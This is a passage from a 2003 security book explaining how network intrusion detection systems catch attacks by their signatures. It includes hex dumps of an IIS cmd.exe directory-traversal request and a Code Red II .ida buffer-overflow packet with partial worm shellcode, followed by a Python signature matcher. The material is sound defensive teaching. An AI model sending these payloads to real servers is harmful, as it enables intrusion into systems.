NIDS Signature Examples


An NIDS operates by examining packets and comparing them to known signatures. A good example of a common attack that can be clearly identified by its signature is the cmd.exe attack used against Internet Information Server (IIS), Microsoft's Web server. This attack is used by Internet worms and viruses such as Nimda and Code Red. In this case, the worm or human attacker attempts to execute a copy of cmd.exe, the Windows command line binary, in a writable directory using a buffer overflow in the IIS Web server module called Internet Server API (ISAPI). If successful, the hacker or worm has access to a command line on that machine and can wreak considerable havoc. However, the command to copy this file is obvious; there is no reason for legitimate users to be executing this file over the network via IIS. So if you see this activity, it's a good bet that it is an intrusion attempt. By examining the packet payload and searching for the string cmd.exe, an NIDS can identify this kind of attack. Listing 7.1 shows one of these packets. The hexadecimal contents are on the left and the ASCII translation is on the right.

Listing 7.1. The cmd.exe Execution Packet

 length = 55
 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
 010 : 35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79   5c%5c../winnt/sy
 020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
 030 : 63 2B 64 69 72 0D 0A                              c+dir..

Another attack that is easy to identify by its signature is the .ida buffer overflow. The Code Red worm propagated using this method. It utilized a buffer overflow in the .ida extension for Microsoft's IIS Web server. This extension is installed by default but is often not needed. If the patch for this vulnerability is not installed, it can give an attacker direct access to your machine. Fortunately, an NIDS can quickly identify these packets by matching the GET /default.ida statement contained in them. You can see a partial listing of an .ida attack in Listing 7.2. This particular one also has the words Code Red II in it, which means it was generated by a Code Red worm trying to infect this machine. Even if your machines are fully patched and immune to these kinds of attacks, it is good to know where they are coming from and at what frequency.

Listing 7.2. Signature of an .ida Attack

 length = 1414
 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
 010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   ?XXXXXXXXXXXXXXX
 020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
 0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   X%u9090%u6858%uc
 100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F   ype: text/xml.Co
 1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33   ntent-length: 33
 1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00   79 ........`....
 1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00   ....dg.6..dg.&..
 1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF   .....h......\...
 1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40   P.U...\...P.U..@
 1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00   .....X....U.=...
 200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6   ....=...........
 210 : C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00   ...T....u..~0...
 220 : 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A   ........F0......
 230 : 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24   ...CodeRedII...$
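As an added example (not part of the book's text), here is a small Python signature matcher in the spirit of what this section describes for both Listing 7.1 and Listing 7.2: it rebuilds a payload from a hex dump in the listing layout used above, normalizes it, and checks it against content signatures for the cmd.exe and .ida attacks. The hex-dump text is Listing 7.1 retyped; the .ida packet (abbreviated to the request line and the CodeRedII marker, without the shellcode bytes) and the benign request are constructed; and the rule table, the sid numbers, and the function names (parse_hexdump, normalize, inspect) are assumptions of this example, not any NIDS's real rule set.

```python
import re
import urllib.parse

# Listing 7.1 retyped in the same "offset : hex bytes  ascii" layout, so the
# parser below works on realistic input (hand-typed copy, not a capture file).
LISTING_7_1 = """\
length = 55
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
010 : 35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  5c%5c../winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
030 : 63 2B 64 69 72 0D 0A                             c+dir..
"""

# Constructed, abbreviated .ida request: request line plus the CodeRedII
# marker seen at the end of Listing 7.2, with the shellcode left out.
IDA_PACKET = (
    b"GET /default.ida?" + b"X" * 224 + b"%u9090%u6858%ucbd3%u7801=a  HTTP/1.0\r\n"
    b"Content-type: text/xml\nContent-length: 3379 \r\n\r\n"
    + b"\x00" * 8 + b"CodeRedII\x00"
)

# Constructed benign request, to show that ordinary traffic raises no alert.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"

# Hypothetical rule table: a byte string to look for per rule, in the spirit
# of the 'content' keyword of Snort-style rules. The sids are invented here.
SIGNATURES = [
    {"sid": 1, "msg": "IIS cmd.exe execution attempt", "content": b"cmd.exe"},
    {"sid": 2, "msg": "IIS .ida buffer overflow attempt", "content": b"GET /default.ida"},
    {"sid": 3, "msg": "Code Red II worm marker", "content": b"CodeRedII"},
]

_DUMP_LINE = re.compile(r"\s*([0-9a-fA-F]{3}) : (.*)$")


def parse_hexdump(text: str) -> bytes:
    """Rebuild the raw payload from an 'offset : hex bytes  ascii' listing.

    Lines without a 3-digit hex offset (such as 'length = 55') are skipped.
    The ASCII column is separated from the hex column by two or more spaces
    and is ignored; only the hex column is decoded.
    """
    payload = bytearray()
    for line in text.splitlines():
        m = _DUMP_LINE.match(line)
        if not m:
            continue
        hex_field = re.split(r"\s{2,}", m.group(2).strip(), maxsplit=1)[0]
        payload += bytes.fromhex(hex_field)
    return bytes(payload)


def normalize(payload: bytes) -> bytes:
    """Decode %XX escapes and lower-case the payload before matching.

    Without this step a request for 'CMD.EXE' or 'cmd%2Eexe' would not match a
    literal 'cmd.exe' signature even though IIS treats them the same way.
    The %uXXXX sequences in the .ida packet are not %XX escapes and stay as-is.
    """
    return urllib.parse.unquote_to_bytes(payload).lower()


def inspect(payload: bytes) -> list:
    """Return the signature entries that fire on one packet payload."""
    body = normalize(payload)
    return [sig for sig in SIGNATURES if sig["content"].lower() in body]


if __name__ == "__main__":
    for label, pkt in [("Listing 7.1", parse_hexdump(LISTING_7_1)),
                       ("Listing 7.2 (abbreviated)", IDA_PACKET),
                       ("benign", BENIGN)]:
        hits = inspect(pkt)
        print(f"{label}: {[s['msg'] for s in hits] or 'no alert'}")
```

Running it reports one alert for the Listing 7.1 packet, two for the abbreviated .ida packet (the .ida request line and the Code Red II marker), and none for the benign request. The normalization step is the part worth noticing: real engines such as Snort do the equivalent in their HTTP preprocessing, because a literal match on raw bytes misses the same request written with different letter case or URL encoding, and it is the decoded request that the Web server actually acts on.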

Open Source Security Tools. Securing Your Unix or Windows Systems
Year: 2003